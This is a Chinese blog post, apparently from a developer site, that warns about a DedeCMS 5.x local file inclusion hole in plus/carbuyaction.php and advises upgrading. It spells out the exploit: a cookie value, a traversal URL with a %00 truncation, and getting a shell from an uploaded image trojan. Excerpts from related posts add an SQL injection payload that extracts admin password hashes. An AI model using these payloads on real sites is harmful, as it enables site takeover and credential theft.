Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复

最新推荐文章于 2024-09-13 18:48:07 发布
最新推荐文章于 2024-09-13 18:48:07 发布
阅读量530 收藏
点赞数
分类专栏: 织梦 文章标签: php
原文链接:https://www.huanhuanhuishou.com/
版权

使用过DEDECMS的人,可能很多都知道了这个漏洞在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下: 漏洞文件carbuyaction.php

 

  1. 首先利用cookie修改工具,加上 code=alipay 然后访问 
  2. http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 
  3. 直接包含成功 
  4. 利用条件为GPC OFF ,或者某些环境下的截断。 
  5. 可以在会员中心里上传个图片木马进行拿shell。 
  6. 还可以包含dede自身文件进行更多利用,这里就不详细了。 
 

现在最新版的DEDECMS5.7已经修复了这个错误,如果是早起的版本DEDECMS请用最新版文件覆盖即可。

                

        

        

    

  


    

      

        

            

              
                
                  zxy840552216
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
Dedecms 前端RCE分析

				
			

			

				

					include_voidmain的博客
				

				

					03-10
					
					670
					
				

			

		

		

			
				
Dedecms 前端RCE分析

			
		

	



                

              
                



	

		

			

				
					
DedeCMS漏洞文件carbuyaction.php

				
			

			

				

					xvrywgb的专栏
				

				

					01-13
					
					2530
					
				

			

		

		

			
				
DedeCMS漏洞文件carbuyaction.php


dedecms教程
DedeCMS漏洞文件carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell

详细说明:漏洞文件carbuyaction.php




本地试了一下,最新DedeCMS版本一样可行。

首先利用cookie修

			
		

	



                


  
              

                


	

		

			

				
					
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

				
			

			

				

					weixin_34090643的博客
				

				

					03-21
					
					1118
					
				

			

		

		

			
				
漏洞版本:

DedeCmsV5.6 

漏洞描述:

DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

1	<?php
02	require_once (dirname(__FILE__) . "/../include/comm...

			
		

	





	

		

			

				
					
DedeCms 5.x 本地文件包含漏洞(respond方法)

				
			

			

				

					weixin_33795743的博客
				

				

					03-21
					
					262
					
				

			

		

		

			
				
漏洞版本:

DedeCms 5.x

漏洞描述:

DedeCms是免费的PHP网站内容管理系统。

plus/carbuyaction.php里没有对变量进行严格的过滤

出现漏洞的两个文件为:
Include/payment/alipay.php
Include/payment/yeepay.php
漏洞均出现在respond方法里

Include/payme...

			
		

	



		

			
		



	

		

			

				
					
织梦Dedecms buy_action.php SQL注入漏洞分析

				
			

			

				

					深秋哋黎明的专栏
				

				

					11-20
					
					5658
					
				

			

		

		

			
				
Dedecms buy_action.php SQL注入漏洞分析

0x01 补丁对比

通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。

sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php

			
		

	





	

		

			

				
					
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)

				
			

			

				

					weixin_33742618的博客
				

				

					04-19
					
					427
					
				

			

		

		

			
				
2019独角兽企业重金招聘Python工程师标准>>>   
                                        
         ...

			
		

	





	

		

			

				
					
Dedecms存在储存型跨站脚本漏洞1

				
			

			

				

					08-03
				

			

		

		

			
				
漏洞存在于Dedecms的会员功能模块,特别是"shop"模块的`carbuyaction.php`文件漏洞细节: 在DedeCMS的V5.7-UTF8-SP2版本,当用户在进行购物操作时,提交的`address`、`des`、`email`和`postname`这四个...

			
		

	





	

		

			

				
					
web应用漏洞.docx

				
			

			

				

					07-05
				

			

		

		

			
				
1. DedeCMS carbuyaction.php 存储型跨站脚本漏洞:攻击者可以通过该漏洞注入恶意脚本。  四、文件包含漏洞  1. DedeCMS 5.7 SP1 /install/index.php 远程文件包含漏洞:攻击者可以通过该漏洞执行任意代码。  五、...

			
		

	





	

		

			

				
					
DEDE织梦支付插件

				
			

			

				

					08-28
				

			

		

		

			
				
1、将以上文件传到网站根目录,有同名文件覆盖  2、在浏览器访问:http://您的网站域名/XddpayInstall.php,点安装  3、注册一个小叮当支付帐号:https://www.xddpay.com,登录后台【API接口】,添加接口,添加成功...

			
		

	





	

		

			

				
					
于飞seo:dedecms织梦文件目录说明讲解大全

				
			

			

				

					仿站、源码搭建/迁移技术博客
				

				

					12-31
					
					716
					
				

			

		

		

			
				
鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦没有相对全面的dedecms文件目录解说,于飞seo在相对全面的基础上整理了以下目录文件。






以下一些目录对应的文件和代表的含义均是在相对详细下完成的,如若有错误联系我们指出。了解织梦文件目录结构有什么?很简单,方便做安全(删除某些不需要的文件)和修改整个系统界面方便。当然更多的好处需要自己根据自己的需求进行挖掘定制了...

			
		

	





	

		

			

				
					
织梦config_base.php 目录在哪里,Dedecms织梦文件目录结构全面解析

				
			

			

				

					weixin_30183847的博客
				

				

					03-12
					
					530
					
				

			

		

		

			
				
Dedecms织梦文件目录结构全面解析织梦无忧2018-12-07 08:36摘要:鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦没有相对全面的dedecms文件目录解说,so,织梦新手网在相对全面的基础上整理了以下目录文件,织梦58首发! 以下一些目录对应的文件和代表的含义均是在相对详细下完成的,如若有错误联鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦...

			
		

	





	

		

			

				
					
Dedecms文件目录结构解说

				
			

			

				

					﹎厡.唻
				

				

					08-31
					
					1108
					
				

			

		

		

			
				
织梦:DedeAMPZ/Web

/根目录


 ../a 默认生成文件存放目录
 ../data 系统缓存或其他可写入数据存放目录
 ../dede 默认后台登录管理(可任意改名)
 ../images 系统默认的部分系统需要的图片目录
 ../include 程序核心系统文件目录
 ../install 安装文件目录
 ../member 会员系统目录
 ../plus

			
		

	





	

		

			

				
					
DedeCMS_v5.7漏洞复现

				
			

			

				

					qq_51459600的博客
				

				

					04-06
					
					1万+
					
				

			

		

		

			
				
DedeCMS_v5.7漏洞复现
环境搭建:
服务器:WinServer2008(10.10.10.143) + phpstudy2018
DedeCMS版本:DedeCMS-V5.7-UTF8-SP2
下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw  提取码: i4wk
0x01 URL重定向
版本<=5.7sp2
漏洞复现
payload:
http://10.10.10.143/Dedecms/plus/download.php?open

			
		

	





	

		

			

				
					
(织梦cms)dedecms5.7注入和上传0day

				
			

			

				

					Yatere的天平秤
				

				

					04-29
					
					1万+
					
				

			

		

		

			
				
漏洞类型:注入漏洞、上传漏洞

漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

  注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergro

			
		

	





	

		

			

				
					
关于Dedecms织梦文件目录结构全面解析

				
			

			

				

					qq_17475727的博客
				

				

					08-19
					
					746
					
				

			

		

		

			
				
本文主要是为了今后对Dedecms做二次开发所写。
安装后dedecms的目录,如下图所示

“a”:  默认HTML文件存放目录
“data”: 系统缓存或其它可写入数据存放目录
“dede”: 默认后台管理目录
“images”: 系统默认模板图片存放目录
“include”: 类库文件目录
“install”: 安装程序目录,安装完后可删除
“member”: 会员目录
“plus”: 附助...

			
		

	





	

		

			

				
					
dedecms 漏洞汇总

					
热门推荐

				
			

			

				

					积木网络
				

				

					02-29
					
					1万+
					
				

			

		

		

			
				
Dedecms 5.6 rss注入漏洞  
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1
DedeCms v5.6 嵌入

			
		

	





	

		

			

				
					
php 5.5.7 漏洞,织梦5.7注入加上传漏洞

				
			

			

				

					weixin_35356909的博客
				

				

					03-19
					
					330
					
				

			

		

		

			
				
会员心查询会员信息语句过滤不严,导致url可提交注入参数;会员心有上传动作过滤不严,导致上传漏洞详细说明:①注入漏洞。这站 https://www.webshell.cc/首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该...

			
		

	





	

		

			

				
					
SEAFARING靶场渗透

					
最新发布

				
			

			

				

					kknifek的博客
				

				

					09-13
					
					558
					
				

			

		

		

			
				
??echo '<??

			
		

	





	

		

			

				
					
去除织梦5.7版权教程:完整步骤解析

				
			

			

				

					
				

			

		

		

			
				
注意,修改开源软件的源代码可能会影响系统的更新和维护,因此在操作前要确保你了解可能的风险,并且备份好原始文件。此外,某些情况下,开源软件的许可协议可能要求保留原始版权信息,所以在进行此类操作时,务必...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值